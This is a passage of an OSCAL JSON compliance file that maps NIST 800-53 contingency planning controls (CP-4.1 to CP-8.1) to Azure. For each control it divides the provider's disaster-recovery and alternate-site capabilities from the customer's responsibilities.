statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1ce9de8d-0316-4fa1-bad1-5921856b3d60","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-4.1","statements":[{"uuid":"2eb00f5e-4d70-4e62-8d27-0fe58705ae68","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-4.1_smt","by-components":[{"uuid":"7575b75b-4d19-444f-9d75-65a5dfe3160d","export":{"provided":[{"uuid":"5e6f3d56-6d8f-42df-bdf2-53d80cc184f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-025"}],"description":"The Drill Team coordinates contingency plan testing and exercises with the organizational elements relevant to the test, for example, the Incident Management, Crisis Communications, or Site Services teams during regular full-region DR drills. 
The BCDR team is engaged in analysis and actions based on results."}],"responsibilities":[{"uuid":"33c7fc2b-c3f0-4128-9fdd-e9e7c6f00493","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-025"}],"description":"The customer is responsible for coordinating contingency plan testing with the testing of related plans (e.g., business continuity, disaster recovery).","provided-uuid":"5e6f3d56-6d8f-42df-bdf2-53d80cc184f2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ee77e745-7498-46ed-a2a1-9965f5a134b1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-4.2","statements":[{"uuid":"df959ab1-b38c-47d0-beb5-e638897768e1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-026"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-4.2_smt.a","by-components":[{"uuid":"dd8fd03c-9e87-47cf-a707-fbe7f05635b1","export":{"provided":[{"uuid":"38b8d6ca-ef4e-46bd-9546-7dbdbc623957","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-026"}],"description":"All Azure sites have dedicated personnel and equivalent capabilities, ensuring contingency personnel are familiar with the facility and available resources as a part of normal job functions.
"}],"responsibilities":[{"uuid":"2cba4e70-c6f0-412a-ae66-ebe4ec6926ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-026"}],"description":"The customer is responsible for testing the contingency plan at an alternate processing location to familiarize contingency personnel with the facility and resources available at the alternate site. Azure can support contingency testing and provide continued system operation during contingency activities if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region.","provided-uuid":"38b8d6ca-ef4e-46bd-9546-7dbdbc623957"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b110b271-9c1f-4844-b39c-efc011553f70","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-027"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-4.2_smt.b","by-components":[{"uuid":"8d8eeedb-6140-40ec-b9ab-3d4d903d2da7","export":{"provided":[{"uuid":"0ee645c5-fb4b-4a98-ad57-a5802fcba440","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-027"}],"description":"All Azure sites have dedicated personnel and equivalent capabilities, ensuring contingency personnel are familiar with the facility and available resources as a part of normal job functions."}],"responsibilities":[{"uuid":"4fba0474-880a-4eb7-becd-4b13045ed0b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-027"}],"description":"The customer is responsible for testing and 
evaluating the contingency plan at an alternate processing site to support contingency operations. Azure can support contingency testing and provide continued system operation during contingency activities if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region.","provided-uuid":"0ee645c5-fb4b-4a98-ad57-a5802fcba440"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6fede57f-1804-496d-93cc-82c1b8155600","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-6","statements":[{"uuid":"1da65946-78c5-4b64-8763-5bae82114380","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-6_smt.a","by-components":[{"uuid":"c5b5eb7f-cd10-48ec-b40a-b1ccdfa4b445","export":{"provided":[{"uuid":"68adf00c-acc6-41fc-85cd-e2c3d57a101b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-028"}],"description":"Azure establishes alternate storage sites at geographically distributed Azure datacenters, including all agreements to permit storage and retrieval of information. 
In addition, each Azure service provides the capabilities and guidance for replication of data to alternate storage sites and seamless failover."}],"responsibilities":[{"uuid":"9342df85-d00e-4d56-a3f9-80c17b0ca22d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-028"}],"description":"The customer is responsible for establishing an alternate storage site with the ability to store and retrieve backup information, and the agreements permitting such activities. Note: if the customer configures Microsoft Azure appropriately for reserving storage capacity in an alternate region, Azure can support the secure storage and retrieval of system data.","provided-uuid":"68adf00c-acc6-41fc-85cd-e2c3d57a101b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3c3ff1d8-7d05-478f-aa52-aeef12f12288","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-6_smt.b","by-components":[{"uuid":"80aa1638-6bb3-4f63-9030-c91835322a46","export":{"provided":[{"uuid":"aa2bc426-b2fc-4995-9625-b1cea5ec74e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-029"}],"description":"All storage sites are Azure datacenters with equivalent security safeguards."}],"responsibilities":[{"uuid":"0183e734-859b-48fb-a51f-4026b3ffabfe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-029"}],"description":"The customer is responsible for establishing an alternate storage site with equivalent security safeguards as the primary 
site. Note: if the customer configures Microsoft Azure appropriately for reserving storage capacity in an alternate region, Azure can support the secure storage and retrieval of system data.","provided-uuid":"aa2bc426-b2fc-4995-9625-b1cea5ec74e0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d527d446-dbd6-4dc6-ab84-21f70169383b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-6.1","statements":[{"uuid":"bfa68529-2309-424a-9255-f33a73b82690","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-6.1_smt","by-components":[{"uuid":"eec7c585-65dc-4e16-a4d1-a93d9abf877f","export":{"provided":[{"uuid":"8a926c46-ae19-4114-8b3a-1d608bdd4079","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-030"}],"description":"Alternate storage sites in the form of Azure datacenters are geographically separated so as not to be susceptible to the same threats. 
The Azure authorization boundary currently consists of fully managed and leased datacenters across geographically separated locations."}],"responsibilities":[{"uuid":"feaed42a-fc27-4fc7-9b7f-af9e667d3cb7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-030"}],"description":"The customer is responsible for establishing an alternate storage site that is separate from the primary storage site to reduce its susceptibility to the same threats (e.g., natural disasters). Note: if the customer configures Microsoft Azure appropriately for reserving storage capacity in an alternate region, Azure can support the secure storage and retrieval of system data.","provided-uuid":"8a926c46-ae19-4114-8b3a-1d608bdd4079"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b90664e7-df2b-4090-8295-cad401dfd93b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-6.2","statements":[{"uuid":"dd29f706-0bd0-47ef-97f3-3f974400dbe5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-031"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-6.2_smt","by-components":[{"uuid":"a8f50328-f982-4d39-ac4f-86248c4e6d4e","export":{"provided":[{"uuid":"6f5d2152-0f71-4bca-a75f-b1f0f5f70ddb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-031"}],"description":"Due to the fully redundant architecture of Azure as described 
in the BCP and DRP, alternate storage sites in the form of Azure datacenters are designed and implemented to be continuously available. Site availability does not impact the RTO or RPO for any given Azure service due to the redundant architecture."}],"responsibilities":[{"uuid":"3a4ee563-26e0-4ed0-8fb6-b15f97194324","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-031"}],"description":"The customer is responsible for establishing an alternate storage site that facilitates recovery operations consistent with customer-defined recovery time objectives (RTOs) and recovery point objectives (RPOs). Azure can support the secure storage and retrieval of system data if the customer configures Microsoft Azure appropriately for reserving storage capacity in an alternate region.","provided-uuid":"6f5d2152-0f71-4bca-a75f-b1f0f5f70ddb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"93fea665-9d0f-4420-a90f-b97d34ba7580","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-6.3","statements":[{"uuid":"e448e07c-37cf-4cd5-9434-5bb1960671d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-032"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-6.3_smt","by-components":[{"uuid":"b9e3b4cd-d53e-4165-84c2-c2472834e387","export":{"provided":[{"uuid":"2ade4e59-f40b-49c5-ae88-8bf7896ce91d","props":[{"ns":"https://azure.microsoft.com/ns/oscal",
"name":"acf-id","value":"CP-06-032"}],"description":"Azure manages all datacenters and has Emergency Management Teams (EMTs) in place to discuss with all team members any accessibility problems to datacenters in the event of an area-wide disruption or disaster and details explicit mitigation actions. If there is a disruption to any datacenter, Azure personnel from that site do not have to go to another datacenter, as there are Azure personnel already engaged and operating at all sites. An area-wide disruption or disaster at the primary site does not affect the Azure secondary site or sites since they are located in geographically separated regions for each system. Azure personnel are located throughout the United States, and have the capability to work remotely."}],"responsibilities":[{"uuid":"66ab5a37-46f3-4e60-b377-c184b9c1287b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-032"}],"description":"The customer is responsible for identifying potential issues and mitigating actions to ensure accessibility to the established alternative storage site during disruption or disaster. 
Note: if the customer configures Microsoft Azure appropriately for reserving storage capacity in an alternate region, Azure can support the secure storage and retrieval of system data.","provided-uuid":"2ade4e59-f40b-49c5-ae88-8bf7896ce91d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8681bab9-8278-4774-a1ce-c9f0312838d1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-7","statements":[{"uuid":"9d5c37fc-b5f2-4f92-b726-04045be83987","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7_smt.a","by-components":[{"uuid":"15614f61-6a05-4fe9-a80b-8c229da097ee","export":{"provided":[{"uuid":"a6d2cc60-15fe-436c-8291-279ad62e7e22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-033"}],"description":"All Azure datacenters can be used as alternate processing sites, and each site has the necessary agreements in place to transfer and resume services logically without equipment transfer. 
Azure service teams determine recovery objectives following the Business Impact Analysis (BIA) process and services are designed and tested to meet objectives, following the Azure Business Continuity Management (BCM) process."}],"responsibilities":[{"uuid":"32162101-e1d9-4754-892b-18dd7746f2ac","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-033"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for establishing an alternate processing site with agreements permitting the transfer and resumption of customer-defined system operations consistent with customer-defined recovery time and recovery point objectives when the primary processing site is unavailable. Note: if the customer configures Azure appropriately for reserving processing capacity in an alternate region, Azure can support the continuation of secure system operation.","provided-uuid":"a6d2cc60-15fe-436c-8291-279ad62e7e22"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"cb10c7b7-c9fd-471e-8904-82288e44b2ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7_smt.b","by-components":[{"uuid":"8c09f959-16b1-4d57-836c-e92150674e60","export":{"provided":[{"uuid":"01b6ee83-b1fa-4f25-8e1b-72288fee06c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-034"}],"description":"All Azure datacenters can be used as alternate processing sites, and each site has the necessary agreements in place to transfer and resume services logically without equipment 
transfer. The BCDR Program in the Azure Global Portal explicitly covers business processes defined during the BIA with Recovery Time Objectives (RTO) and Recovery Point Objectives (RPO) for each service."}],"responsibilities":[{"uuid":"f71167f5-eee0-41d8-8684-345084ae42b4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-034"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for establishing an alternate processing site with the resources and ability to transfer and resume operations within the time period defined in CP-07.a. Note: if the customer configures Azure appropriately for reserving processing capacity in an alternate region, Azure can support the continuation of secure system operation.\n\nCustomer and Microsoft Responsibilities: Microsoft takes an infrastructure approach to disaster recovery, providing the capabilities required for customers to implement the recovery appropriate for their business. Customers must follow the appropriate guidance to ensure correct implementation of their business continuity solution. 
For example, to protect Azure Storage data from a region-wide disaster, storage accounts must be configured to use geo-replication (GRS or RA-GRS).","provided-uuid":"01b6ee83-b1fa-4f25-8e1b-72288fee06c8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b881f552-8002-4031-a801-6bc3ac54613a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7_smt.c","by-components":[{"uuid":"2a92a0ed-2489-4d95-8720-a4c4bf3e3c59","export":{"provided":[{"uuid":"b02d3a16-e3e0-4fe5-9c5f-76e76d3394fd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-035"}],"description":"As Azure datacenters, Azure's alternate data processing sites have equivalent physical and logical security safeguards in place."}],"responsibilities":[{"uuid":"aaeb0d0a-85fa-4fc3-8458-0b3e69b5edd4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-035"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for establishing an alternate processing site that has security safeguards equivalent to the primary site. 
Note: if the customer configures Azure appropriately for reserving processing capacity in an alternate region, Azure can support the continuation of secure system operation.","provided-uuid":"b02d3a16-e3e0-4fe5-9c5f-76e76d3394fd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"acb96797-64cb-47c9-8537-946998cbe607","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-7.1","statements":[{"uuid":"c4a6bb9e-7081-4af7-b038-23057c5acb4b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7.1_smt","by-components":[{"uuid":"6d6dff07-03de-445e-897e-b07e132d31c0","export":{"provided":[{"uuid":"e7acb054-8a82-4e6e-882f-814642d7742b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-036"}],"description":"As Azure datacenters, alternate processing sites are geographically separated so as not to be susceptible to the same threats. 
The Azure authorization boundary currently consists of fully managed and leased datacenters across geographically separated locations."}],"responsibilities":[{"uuid":"8e8f68bb-a41b-467d-8a91-c3dbbbcfd26e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-036"}],"description":"The customer is responsible for establishing an alternative processing site that is separate from the primary processing site to reduce its susceptibility to the same threats (e.g., natural disasters). Note: if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region, Azure can support the continuation of secure system operation.","provided-uuid":"e7acb054-8a82-4e6e-882f-814642d7742b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0152ce38-81a6-4d0d-b1fd-e4756acd03b8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-7.2","statements":[{"uuid":"b3002a1b-0b78-493c-bd87-9e3acdbcd8a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-037"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7.2_smt","by-components":[{"uuid":"b48fbb4f-d8b8-4ce0-8e70-b4083419c26f","export":{"provided":[{"uuid":"a5c0a67a-4d57-40d1-b5f4-0ec436239a19","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-037"}],"description":"Azure manages all datacenters and has Emergency Management Teams (EMTs) in place to discuss with all team 
members any accessibility problems to datacenters in the event of an area-wide disruption or disaster and details explicit mitigation actions. If there is a disruption to any datacenter, Azure personnel from that site do not have to go to another datacenter, as there are Azure personnel already engaged and operating at all sites. An area-wide disruption or disaster at the primary site does not affect the Azure secondary site or sites since they are located in geographically separated regions for each system. Azure personnel are located throughout the United States, and have the capability to work remotely."}],"responsibilities":[{"uuid":"e7728061-4cb3-4d0c-88d5-4499bc08f46b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-037"}],"description":"The customer is responsible for identifying issues and mitigating actions to ensure accessibility to the established alternative processing site during disruption or disaster. Note: if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region, Azure can support the continuation of secure system operation.","provided-uuid":"a5c0a67a-4d57-40d1-b5f4-0ec436239a19"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"3ef4d705-9b2a-4867-9199-21bdaa3843b9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-7.3","statements":[{"uuid":"dbe154c5-e2d8-4ced-97ef-df0afad459fe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7.3_smt","by-components":[{"uuid":"b3437875-e1eb-4413-ace5-861f00d58624","export":{"provided":[{"uuid":"b08a39a5-8be9-4c62-93a9-c6562959e414","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-038"}],"description":"Azure is located within Azure datacenters. Azure is responsible for managing all alternate processing sites for Azure; therefore, it is not necessary for site agreements to be in place. Priority-of-service provisions are not required because Azure owns and manages or leases all datacenter facilities for Azure.\n\nRecovery time objectives (RTOs) are established for Azure services and are detailed as part of the BCM process. 
These RTOs serve as the alternate processing site agreements, which determine the priority-of-service provisions for each Azure service."}],"responsibilities":[{"uuid":"fe11b0a7-e643-4a52-bdb5-4fbdcb438346","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-038"}],"description":"The customer is responsible for establishing alternate processing site agreements containing priority-of-service provisions which correspond with customer-defined availability requirements (e.g., RTOs). Note: if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region, Azure can support the continuation of secure system operation.","provided-uuid":"b08a39a5-8be9-4c62-93a9-c6562959e414"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6063cfb0-93d7-49bd-a331-5cd2a2a7f044","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-7.4","statements":[{"uuid":"4723d5e2-d1b8-417f-8076-a33ea99ad31c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-7.4_smt","by-components":[{"uuid":"db9c1f36-7d04-48c9-8393-a18b82514900","export":{"provided":[{"uuid":"af8cb613-e52e-4e94-b983-43969994125f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-039"}],"description":"Azure deploys services in redundant configurations. 
Azure datacenters functioning as alternate sites are always ready to be used as operational sites supporting all missions and business functions."}],"responsibilities":[{"uuid":"e86a232a-f8af-4c0e-9bfe-8df5854a10ad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-039"}],"description":"The customer is responsible for preparing the alternate processing site to be used as the operational site supporting essential missions and business functions. Azure can support the continuation of secure system operation if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region.","provided-uuid":"af8cb613-e52e-4e94-b983-43969994125f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5effc7d1-f7a2-49e7-a800-b8bdeb786149","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-8","statements":[{"uuid":"522f2220-51cb-4ccc-89aa-519e9d6530ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-040"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8_smt","by-components":[{"uuid":"4ec1af02-de4b-42af-9962-6abb7a695d69","export":{"provided":[{"uuid":"21e4798e-44b3-4158-9c4c-63358cf79ec6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-040"}],"description":"Azure is responsible for ensuring continuity of its telecommunications services through the process of utilizing diverse fiber routes and redundant hardware to provide maximum availability at each datacenter. 
Each datacenter represented as part of the Azure boundary is active, independent from all other datacenters, and fully operational with the ability to provide services at any time. Critical problems are defined as incidents or outages, other than caused by an Excused Outage, which cause a Microsoft Equipment failure, as a result of which Microsoft cannot receive any data. In addition to the active datacenter configuration, and as an ISP whose purpose is to exclusively host online services, Azure maintains a global fiber backbone comparable to multiple commercial ISPs. Some fiber routes have triple redundancy but all have a minimum of double redundancy. Azure contracts for the fiber paths are dedicated to Microsoft. Microsoft engages and contracts with providers to provide field service maintenance in the event of faults, defects, or failures."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"06f86bde-1e64-4760-8e92-e89e6079bb38","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-8.1","statements":[{"uuid":"33d83b75-152f-48b5-bb97-555f65d5e718","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-041"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.1_smt.a","by-components":[{"uuid":"df9bd170-fe87-41ae-a42e-d58cb08c70c9","export":{"provided":[{"uuid":"4033da71-2fdd-4698-b32b-462c6372de37","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-041"}],"description":"Network routing for Azure datacenters is proprietary, and therefore a Service Priority setting for emergency purposes is not required. 
